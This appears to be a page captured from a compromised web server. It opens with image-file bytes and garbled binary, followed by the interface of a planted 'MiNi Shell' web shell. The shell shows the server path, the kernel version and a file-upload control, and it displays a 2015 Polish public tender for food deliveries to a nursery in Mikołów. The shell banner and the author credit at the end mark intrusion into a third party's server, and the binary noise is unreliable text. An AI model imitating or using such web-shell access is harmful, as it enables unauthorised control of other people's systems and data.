JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150617/88875-N-2015.html

<p class="kh_header"><b>Mikołów: Dostawa żywności dla Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie</b><br>
<b>Numer ogłoszenia: 88875 - 2015; data zamieszczenia: 17.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Żłobek Miejski im. Tadeusza Więcka , Ul. Krakowska 30, 43-190 Mikołów, woj. śląskie, tel. 0323273027, faks 0323273027.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlobek.mikolow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa żywności dla Żłobka Miejskiego im. Tadeusza Więcka w Mikołowie
Część 1 - produkty mleczarskie - (szacowane ilości opisano w załączniku A do SIWZ) Mleko krowie 3,2%  (2 l); Śmietana 18% nie mniej niż 400 g kwaśna; Śmietanka 30% nie mniej niż 200g  słodka; Jogurt naturalny bez cukru kubek  nie mniej niż 380g  nie więcej niż 400g; Maślanka  naturalna  1l; Twaróg  półtłusty pakowany 0.25kg w pergamin zawartość tłuszczu  nie mniej niż 3,5%; Ser żółty zawartość tłuszczu min. 26% ; zawartość białka  min. 25%podpuszczkowy , dojrzewający typu holenderskiego; Masło extra 200g -250g zaw. tłuszczu min.82%

Cześć 2 - pieczywo - (szacowane ilości opisano w załączniku B do SIWZ) Chleb zwykły krojony(900g); Chleb wieloziarnisty(400g); Chleb sojowo -dyniowy(400g); Chleb żytni (100% mąki żytniej); Chałka półcukiernicza (500g); Babka piaskowa duża(500g); Babka drożdżowa duża (500g); Mufiny małe  z marmoladą wieloowocową ( 50g); Baton wrocławski(350g); Groszek ptysiowy

Część 3 - produkty sypkie , przyprawy , dżemy , woda mineralna (szacowane ilości opisano w załączniku C do SIWZ)- Bazylia sucha 15g; Bułka tarta 500g; Ciastka kruche zawartość tłuszczu w 100g maks.19%,cukru 21%, opakowania 2000g do 2500g; Cukier biały; Cukier puder 500g; Cukier waniliowy 16g; Cynamon mielony 25g; Dżem niskosłodzony truskawkowy, wiśniowy z zawartością  owoców w 100g min. 40 g ; słoik min. 450g; Galaretka owocowa wiśniowa, truskawkowa, malinowa min.75g; Herbata czarna ekspresowa opakowanie min. 100 torebek; Herbata owocowa ekspresowa min.40g,smak malinowy ,owoce leśne; Jajka świeże L; Kakao zwykłe min.80g  extra  ciemne, zawartość tłuszczu kakaowego max 12% ; Kasza manna 100% kaszy z pszenicy 400g; Kasza perłowa  jęczmienna             średnia 400g; Kasza jaglana 400g; Kasza  gryczana biała 400g; Kasza gryczana palona 400g; Kawa zbożowa expresowa min.40g; Kisiel wiśniowy, malinowy, truskawkowy, pomarańczowy nie mniej niż 75 g ; Kminek cały 20g; Koncentrat  buraczany bez konserwantów  min.59 % soku z buraków butelka szklana 300ml; Koncentrat pomidorowy 30%,sloik szklany 200g; Koncentrat pomidorowy 30%, słoik szklany 900g.; Konfitura z malin 60g owoców na 100g produktu , słoik zawartość netto 210g; Kwasek cytrynowy  20g; Liść laurowy100g; Lubczyk otarty  160g; Majeranek  otarty 150g; Makaron  gruby świderki 500g; Makaron nitki cztero-jajeczny 250g; Mąka pszenna typ -550; Mąka ziemniaczana100% skrobi ziemniaczanej; Miód  pszczeli wielokwiatowy  słoik min.900g; Musztarda  stołowa 200g; Ocet  spirytusowy 10% 500g; Olej rzepakowy 1000g; Oregano  suszone 15g; Papryka słodka mielona  600g; Pieprz  czarny mielony 800g.; Proszek do pieczenia 20g; Przyprawa warzywna bez substancji konserwujących, zawartość warzyw nie mniej niż 15%  ; op.1000g; Ryż  biały; Syrop  pasteryzowany, malinowy,bez konserwantów butelka min.440ml; 
Sól jodowana, warzona  zawartość chlorku sodu 99,8%; Ziele angielskie  całe 20g; 
Woda źródlana nie gazowana 1500g  opakowanie- zgrzewka 6szt; Woda mineralna nie gazowana 1500g  opakowanie-  zgrzewka 6szt; Woda mineralna gazowana 1500g opakowanie-  zgrzewka 6szt; Woda źródlana gazowana 1500g opakowanie-  zgrzewka 6szt

Część 4 - ryby - (szacowane ilości opisano w załączniku D do SIWZ) Mintaj filet klasa 1  ; max.5%glazury; Dorsz filet mrożony klasa 1 ;
max 5% glazury; Makrela wędzona opakowanie próżniowe; Tuńczyk w sosie własnym w kawałkach(170g) puszka;

Część 5 - mrożonki (szacowane ilości opisano w załączniku E do SIWZ) - Truskawka mrożona klasa 1 2500g ; Brukselka mrożona klasa1 2500g ; Brokuł mrożony różyczki klasa 1 2500g; Szpinak liść mrożony klasa 1   2500g; Bukiet warzyw 7-składnikowa klasa 1  ; 2500g; Włoszczyzna paski marchew, seler, pietruszka, por klasa 1 2500g; Fasolka szparagowa cięta mrożona klasa 1  ; 2500g; Kalafior różyczki mrożony klasa 1 ; 2500g.; Groszek zielony mrożony klasa 1  2500g; Wiśnie bez pestek mrożone klasa 1  2500g; Mieszanka kompotowa co najmniej 5-składnikowa ( truskawka, porzeczka czarna ,czerwona, wiśnia, agrest)  składnikowa klasa 1  2500g; Barszcz ukraiński klasa 1 ; marchew, seler ,pietruszka, por , buraki ; 2500g.

Część 6 - drób , mięso , wędliny (szacowane ilości opisano w załączniku F do SIWZ) - Kurczak świeży min.2 kg szt.; Filet kurczaka bez skóry ,bez kości; Porcje rosołowe z kurczaka; Filet z indyka bez skóry, bez kości; Schab b/k; Łopatka wieprzowa b/k bez skóry;Kita wieprzowa b/k, bez skóry; Szynka wieprzowa , gotowana min.85%; Polędwica wieprzowa typu sopocka min.85% mięsa; Polędwica drobiowa min.60% mięsa; Kiełbasa gruba typ kanapkowa gatunek dębicka min.80% mięsa; Boczek wędzony bez  skóry, bez żeber , chudy; Kiełbasa cienka min 100g   szt. typu śląska min.70% mięsa
a)	Wędliny - w składzie wieprzowe, nie zawierające odkostnionej masy mięsnej, skórek wieprzowych i drobiowych oraz konserwantów chemicznych.
b)	Mięso -ze świeżego rozbioru, bez konserwantów

Część 7 - warzywa i owoce (szacowane ilości opisano w załączniku G do SIWZ)- Arbuz słodki , czerwony; Banany żółte; Botwina min.1200g pęczek; Brokuł  świeży min.1500g szt.; Buraki czerwone średnie; Cebula zwyczajna; Cytryna; Czarna porzeczka świeża; Czosnek nieulegający pleśnieniu, o intensywnym zapachu; Fasola szparagowa świeża;Gruszki konferencja; Jabłka sezonowe : papierówka . lobo , kortland; Kalafior świeży; Kalarepa; Kapusta biała młoda; Kapusta biała ; Kapusta czerwona młoda; Kapusta czerwona; Kapusta kiszona wiaderko  5 kg; Kapusta pekińska; Kapusta włoska; Koperek min.50g pęczek; Maliny; Mandarynki; Marchewka; Ogórki kiszone wiadro nie mniejsze niż 4 l ; Ogórki zielone; Pietruszka korzeń; Pomidory; Por; Rzodkiewka; Seler; Szczypiorek; Śliwki ; Wiśnie; Truskawki świeże; Zielona pietruszka min. 50g pęczek; Ziemniaki; Kiwi; Nektaryny

Część 8 - produkty dla niemowląt (szacowane ilości opisano w załączniku H do SIWZ) - Mleko następne dla niemowląt powyżej 6 miesiąca życia; 2 ;  skład kompozycja prebiotyków (fruktooligosacharydów , galaktooligosacharydów i błonnika),
witaminy , niezawierające dodatków zbożowych i glutenu opakowanie kartonowe, min.800 g; Kaszka mleczno - ryżowa po 4 miesiącu - skład min. 39% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 8 , składniki mineralne , smaki bananowa, jabłkowa ; opakowanie min. 230 g; Kaszka mleczno - ryżowa po 6 miesiącu - skład min. 39% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 9 , składniki mineralne , różne smaki np. bananowa , jabłkowa ; opakowanie 
min. 230 g; Kaszka ryżowa po 4 miesiącu - skład min. 75% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 8 , składniki mineralne , różne smaki np. malinowy , truskawkowy ; opakowanie min. 180 g; Kaszka ryżowa po 6 miesiącu - skład min. 75% mąki ryżowej , min.32% odtłuszczonego mleka , witaminy min. 9 , składniki mineralne , różne smaki np. malinowy , truskawkowy  ; opakowanie 
min. 180 g; Herbatka rozpuszczalna, granulowana po 4 miesiącu  ,o smaku kopru włoskiego, puszki o poj. min.200g; Herbatka rozpuszczalna, granulowana po 
4 miesiącu  , jabłkowa z  melisą,  puszki  o poj. min.200g; Herbatka rozpuszczalna, granulowana po  6 miesiącu  o smaku maliny z dziką różą , pakowana w puszki  o poj. min.400g

Część 9 - produkty dietetyczne (szacowane ilości opisano w załączniku I do SIWZ)- Bezglutenowy produkt zbożowy ( kaszka) nie zawierający mleka krowiego , 
białka sojowego , laktozy , glutenu ; skład : ryż , mąka chleba świętojańskiego , witaminy , składniki mineralne ; opakowanie min.500g; Mleko następne dla niemowląt 
powyżej 6 miesiąca życia; dietetyczny środek spożywczy specjalnego przeznaczenia 2 ; dla niemowląt z tendencją do kolek i zaparć ; z obniżoną zawartością laktozy , zawierający nukleotydy ; puszka min. 400 g; Mleko następne dla niemowląt 
powyżej 6 miesiąca życia 2, produkt bezglutenowy ; zawiera: bifidus, białko ,witaminy, cynk, żelazo, wit. A i  składniki mineralne ; opakowanie kartonowe min. 350 g; Chleb bezglutenowy , tostowy; bez glutenu, bez jaj, bez czekolady, bez soi w składzie m.in. skrobia pszenna bezglutenowa, skrobia kukurydziana, mąka ryżowa, mąka kukurydziana ; pakowany próżniowo , opakowanie min. 400g; Pieczywo chrupkie lekkie żytnie ,z niską zawartością tłuszczu , min.13% błonnika , min.25% pełnego ziarna ; opakowanie min..140g; Pieczywo chrupkie lekkie pszenne z niską zawartością tłuszczu , min.10% błonnika , min.25% pełnego ziarna ; opakowanie min..140g
Makaron bezglutenowy  , kukurydziany ; skład 100% mąki kukurydzianej ; opakowanie min. 500g; Makaron bezglutenowy  , ryżowy ; skład 100% mąki ryżowej ; opakowanie min. 500g.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.88.20.00-4, 15.10.00.00-9, 15.11.20.00-6, 15.13.11.30-5, 15.51.00.00-3, 15.33.11.70-9, 15.88.40.00-8, 15.81.10.00-6, 15.22.10.00-3, 15.23.40.00-7, 15.24.10.00-9, 15.80.00.00-6, 15.98.10.00-8, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo tj zgodne z opisem przedmiotu zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji określonej w art. 144 ustawy PZP. t.j.:
a) zmiana wynagrodzenia w przypadku zmiany urzędowej stawki VAT,
b) wycofania produktu przez producenta i propozycji zamiennika o takiej samej lub wyższej jakości za zgodą zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlobek.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żłobek Miejski w Mikołowie im. Tadeusza Więcka
ul. Krakowska 30, 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 11:00, miejsce: Żłobek Miejski w Mikołowie im. Tadeusza Więcka
ul. Krakowska 30, 
43-190 Mikołów
I piętro pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Ministra Pracy i Polityki Społecznej w ramach Resortowego programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 Maluch - edycja 2015.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com